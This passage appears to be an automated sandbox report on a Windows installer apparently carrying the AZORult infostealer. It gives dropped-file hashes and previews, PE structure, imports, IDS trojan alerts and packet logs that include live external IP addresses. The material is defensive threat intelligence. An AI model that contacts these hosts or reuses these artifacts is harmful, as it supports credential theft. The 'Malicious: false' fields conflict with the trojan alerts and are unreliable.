Encrypted:	false
SSDEEP:	192:B3tdgdRmAMgyWkSctse3XX6ZjuguOixHRYqx0NzZW+08e:B3tuPdjJ0TCzZWv
MD5:	BD46EB22C1A1B4EA40373E8F57BFF4E3
SHA1:	CC2943E660BBB1697B7561F2776A7BCE2F36718A
SHA-256:	8361836BCB172722E5F2EE90AF31834B9B08B828A90E80E0BB930C336001B4CE
SHA-512:	5994643BCDFDF59B7EBF8FE36BC30CF0A454966FA95741D80AC81E9C42126A66ACDD782F6D7852A35CAE171FCC0DE1218EC1CD951829F7EC1C72B35EE7487D74
Malicious:	false
Preview:	/.* 2018-09-27.. The author disclaims copyright to this source code. In place of. a legal notice, here is a blessing:.. May you do good and not evil.. May you find forgiveness for yourself and forgive others.. May you share freely, never taking more than you give...***********************************************************************.. This file demonstrates an eponymous virtual table that returns information. from sqlite3_status64() and sqlite3_db_status()... Usage example:.. .load ./memstat. .mode quote. .header on.** SELECT * FROM memstat;./.#if !defined(SQLITE_CORE) \|\| defined(SQLITE_ENABLE_MEMSTATVTAB).#if !defined(SQLITEINT_H).#include "sqlite3ext.h".#endif.SQLITE_EXTENSION_INIT1.#include <assert.h>.#include <string.h>..#ifndef SQLITE_OMIT_VIRTUALTABLE../ memstat_vtab is a subclass of sqlite3_vtab which will.** serve as the underlying representation of a memstat virtual table.*/.typedef struct memstat_vtab memsta

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Coasting102.For

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	data
Category:	dropped
Size (bytes):	125801
Entropy (8bit):	7.998523783088745
Encrypted:	true
SSDEEP:	3072:RhtQlryNxvwwP0nccqsIyxErSJE/zCClGEog7xfMR9UtLxo:RAyNxvhP0cAJbJE/O+be
MD5:	F79429CFC0A30DD02E6738983443837B
SHA1:	9285EF62440B8BCC95D566ABCD6ADD3A67BA0AA0
SHA-256:	12A9EE2C36002CF30EEF2446FD8B42BF8544A5C41B35DD7C7C7C7A65CC4C6F59
SHA-512:	8F99C12264642E2EA535D099FE003C48E7D4FE40D18CE2CD78B9AA0B172FB647A85F961637386B06FC0E06B024B0E1CA7F50B52A8A2E6C2546CF0AB28B25A7D7
Malicious:	false
Preview:	......3.<...z'.:w9..YX'I...L9A...{..D.:.8.?}.L..d.<iC..7.......ro...k..98].A.3...2....a...G...O....TH5......B.....k..y{....Y.....r...pg....L....v.\|./..0.D.../..#..#....3.-...<Hf.+....h..enR\J.......Y..s}.L.......!}a.c:..3...]..7..]...y5'.).W..mTb'C8.@.Hv.Z.m..h8.C..5.M(...S.............L.......3....."Y....9C.....lQ.V.6.F..Ih4.)-M..m.M........ex.YD...ID.dr....f...p.\|.......t..3<.%l.......G.P..x.X8Q#.S..Z)Z.L.c..=..C..c.f2..:.FG<.V....[..H#...Id....p.[..UW.d@=..:..^.9........O.1./..Z.(.vrb&.....UD:s..$.#.[.8...\l...z.Ft"7l\|..nc9,.....;.c&Ul..../..x...wO.{5.3......'.{..3s..<...w...o...+.....D...!.\..C../O....D...2.a..A......;r...z.g.7.1.U...J..v0s../.......U.Y..Pl..........,\|.Z.~.."...7._..)..\|..;#O.95.9*..h..mF6.p.\^...'...@'p=H%}ie..c....UD.^JD.9$\|..,WPK.j....q.<R..0.....89HTo.W6...9k.R.[....!.w...Q...;3...[.).2..'..E..n..P....m.....Ue...&....\|....k.S..-O..&...0...!..J..o.SI.....6.#.'.efOt.DH)..F\.f0......?.{..v.`...7./.J..zo..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Novelizes\selection-end-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	138
Entropy (8bit):	5.559646592748364
Encrypted:	false
SSDEEP:	3:yionv//thPl9vt3lAnsrtxBllO9p2hkq8PQ1/kbcw1w9lDk7kup:6v/lhPys8pQt8PQ2cw1IlDXup
MD5:	9863709F8F136F0F38A5D9CF2740143A
SHA1:	0EC6AA74A3FED4719B1B8D2E8468239489D84427
SHA-256:	2C86B3EDF2A397608FE0C12A634F175DE1E3C4E5C4610B8457578B549069A7B0
SHA-512:	B1D8DC9CAFF35264E117201C0DB2112F4C07BAB9235188D32F90B9D00DC2E7AC27ECC1FC9753C5F50949C95D91EEA0C5F318D6D1C8D7587CA0A68AD2CC1C4EB5
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d....AIDAT8.c`........X..X......C...u..(&.%.. ..t.H6...$......S.F.....a/..&I......IEND.B`.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\libxml2-2.0.typelib

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1245
Entropy (8bit):	5.462849750105637
Encrypted:	false
SSDEEP:	24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
MD5:	5343C1A8B203C162A3BF3870D9F50FD4
SHA1:	04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
SHA-256:	DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
SHA-512:	E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
Malicious:	false
Preview:	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.809605729039489
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Swift Mesaj#U0131#09971.exe
File size:	379329
MD5:	310df09294b852bab67e158d95788150
SHA1:	9b69175fcbcc718212d21a77d39969309e9787f8
SHA256:	d27bf1156e1a463ebada17bac3b3a314835cead7e75c4770c95ff21f06e00310
SHA512:	1a04ea3cb29e0ea106ea89d79cf0af5d995f31d3b43fcf80886e488bf86be0bbb928a694653abd996e23ab51d25bbbeba5b2a8042df0aacd4fc18c56f82a4ec5
SSDEEP:	6144:nQ606xDpoDTOfHQerv77fY7U/KTdZ1sj60AyNxvhP0cAJbJE/O+bfTv/1:FpoPOfQqvHfY7UCry6svmb+3H1
TLSH:	168412612364C947E66451B0DC1282F39A769C15E20B3FCFE3913D4CBE32B60E92E795
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...6.uY.................f.........

File Icon


Icon Hash:	c60ccd1616164e46

Static PE Info

General

Entrypoint:	0x403373
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x59759536 [Mon Jul 24 06:35:34 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b34f154ec913d2d2c435cbd644e91687

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [00434EECh], eax
je 00007F1B7483A023h
push ebx
call 00007F1B7483D2B9h
cmp eax, ebx
je 00007F1B7483A019h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F1B7483D233h
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F1B74839FFCh
push 0000000Ah
call 00007F1B7483D28Ch
push 00000008h
call 00007F1B7483D285h
push 00000006h
mov dword ptr [00434EE4h], eax
call 00007F1B7483D279h
cmp eax, ebx
je 00007F1B7483A021h
push 0000001Eh
call eax
test eax, eax
je 00007F1B7483A019h
or byte ptr [00434EEFh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [00434FB8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 0042B208h
call dword ptr [00408188h]
push 0040A2C8h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8608	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x76000	0x16898	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x65ef	0x6600	False	0.6750919117647058	data	6.514810500836391	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x149a	0x1600	False	0.43803267045454547	data	5.007075185851696	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2aff8	0x600	False	0.5162760416666666	data	4.036693470004838	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x41000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x76000	0x16898	0x16a00	False	0.7946089433701657	data	7.153289056271752	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_BITMAP	0x76478	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States
RT_ICON	0x767e0	0x9d19	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x80500	0x4102	PNG image data, 256 x 256, 8-bit colormap, non-interlaced	English	United States
RT_ICON	0x84608	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States
RT_ICON	0x86bb0	0x16e8	PNG image data, 256 x 256, 4-bit colormap, non-interlaced	English	United States
RT_ICON	0x88298	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States
RT_ICON	0x89340	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304	English	United States
RT_ICON	0x8a1e8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024	English	United States
RT_ICON	0x8aa90	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States
RT_ICON	0x8b0f8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256	English	United States
RT_ICON	0x8b660	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States
RT_ICON	0x8bac8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States
RT_ICON	0x8bdb0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States
RT_DIALOG	0x8bed8	0x144	data	English	United States
RT_DIALOG	0x8c020	0x13c	data	English	United States
RT_DIALOG	0x8c160	0x100	data	English	United States
RT_DIALOG	0x8c260	0x11c	data	English	United States
RT_DIALOG	0x8c380	0xc4	data	English	United States
RT_DIALOG	0x8c448	0x60	data	English	United States
RT_GROUP_ICON	0x8c4a8	0xae	data	English	United States
RT_MANIFEST	0x8c558	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
172.67.203.65192.168.11.2080498362029137 11/28/22-12:46:57.711672	TCP	2029137	ET TROJAN AZORult v3.3 Server Response M2	80	49836	172.67.203.65	192.168.11.20
192.168.11.20172.67.203.6549836802029468 11/28/22-12:46:56.779159	TCP	2029468	ET TROJAN Win32/AZORult V3.3 Client Checkin M15	49836	80	192.168.11.20	172.67.203.65

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 28, 2022 12:46:55.603820086 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:55.603908062 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:55.604131937 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:55.629722118 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:55.629785061 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:55.932869911 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:55.933147907 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.057482958 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.057508945 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.057931900 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.058120012 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.061511993 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.104389906 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.194681883 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.194745064 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.194956064 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.195015907 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.195036888 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.195287943 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.326483965 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.326664925 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.326752901 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.326767921 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.326795101 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.326910019 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.326910019 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.326971054 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.327001095 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.327014923 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.327063084 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.327265978 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.327265978 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.458192110 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.458354950 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.458357096 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.458451033 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.458484888 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.458631992 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.458683014 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.458790064 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.458949089 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.459009886 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.459053040 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.459086895 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.459142923 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.459295034 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.459330082 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.459357023 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.459449053 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.459460020 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.459639072 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.459676027 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.459702015 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.459927082 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.540010929 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.540296078 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.591116905 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.591326952 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.591387987 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.591638088 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.591880083 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.591974020 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.592205048 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.592233896 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.592281103 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.592349052 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.592525959 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.592652082 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.592652082 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.592720032 CET	443	49834	103.14.99.114	192.168.11.20
Nov 28, 2022 12:46:56.592911959 CET	49834	443	192.168.11.20	103.14.99.114
Nov 28, 2022 12:46:56.766000032 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:56.778613091 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:56.778862953 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:56.779159069 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:56.791711092 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.711672068 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.711761951 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.711833000 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.711895943 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.711905956 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.711961031 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.711972952 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.712023973 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.712085962 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.712094069 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.712151051 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.712151051 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.712212086 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.712215900 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.712274075 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.712280989 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.712403059 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.712400913 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.712461948 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.712471008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.712529898 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.712603092 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.712661982 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.712807894 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.714231014 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.714313030 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.714378119 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.714438915 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.714443922 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.714504004 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.714509010 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.714574099 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.714637995 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.714700937 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.714726925 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.714726925 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.714764118 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.714793921 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.714828014 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.714890957 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.714907885 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.714955091 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.715078115 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.715079069 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.715174913 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.715481043 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.715611935 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.715677977 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.715707064 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.715739965 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.715768099 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.715804100 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.715939045 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.716037989 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.724951029 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.724973917 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.725126028 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.725147963 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.725167036 CET	80	49836	172.67.203.65	192.168.11.20
